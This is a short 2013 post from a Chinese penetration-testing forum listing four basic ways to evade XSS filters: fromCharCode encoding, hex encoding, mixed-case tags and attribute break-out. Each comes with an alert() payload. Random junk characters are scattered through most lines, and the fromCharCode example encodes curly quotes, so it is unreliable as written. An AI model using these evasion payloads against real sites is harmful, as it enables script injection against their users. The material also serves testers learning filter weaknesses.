中国网络渗透测试联盟

标题: XSS 绕过技术 [打印本页]
作者: admin    时间: 2013-2-14 00:10
标题: XSS 绕过技术
四种超级基础的绕过方法。5 K0 b: |# I, L9 c' G5 o4 u- N/ R/ d& M1 Q
1.转换为ASCII码( L! @" ^2 ~5 r4 s  }8 W; y
例子:原脚本为<script>alert(‘I love F4ck’)</script >
  N2 M2 q2 \: e通过转换,变成:
  c5 N3 k5 E. e4 P2 K<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>9 s# D' v$ _! U# Y6 D" C' K
3 W- R6 O! y6 x, H+ k5 @/ Y7 m
2.转换为HEX(十六进制)
, q2 m3 R2 f1 l0 E; Q例子:原脚本为<script>alert(‘I love F4ck’)</script>- w4 K$ K$ M% N8 E- y
通过转换,变成:0 n6 J2 o  Z* B
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e, P- f; L5 K/ N) Y+ k

' @& Y! |# V6 z/ C$ w4 `3.转换脚本的大小写6 w" |3 }& Z9 I2 X5 O( J
例子:原脚本为<script>alert(‘I love F4ck’)</script>2 p* a  x. [) w3 D1 I
转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>
* p/ @# H& s$ T( z 3 |  v' V5 j" X! _# ^/ H
4.增加闭合标记”>, O7 n7 Q2 b& z
例子:原脚本为<script>alert(‘I love F4ck’)</script>
8 M- ~% \4 a7 q/ b转换为:”><script>alert(‘I love F4ck’)</script>; M. x/ y# T. M
更详细绕过技术请参考此网页
$ q0 K$ x$ t" z- W+ N+ \6 Thttps://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet6 o9 c% S+ L# }* r* P- G$ L
' i! A' V1 l. d& Z1 P; K4 O1 h1 N, h
转换工具使用的是火狐的 hackbar mozilla addon.



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2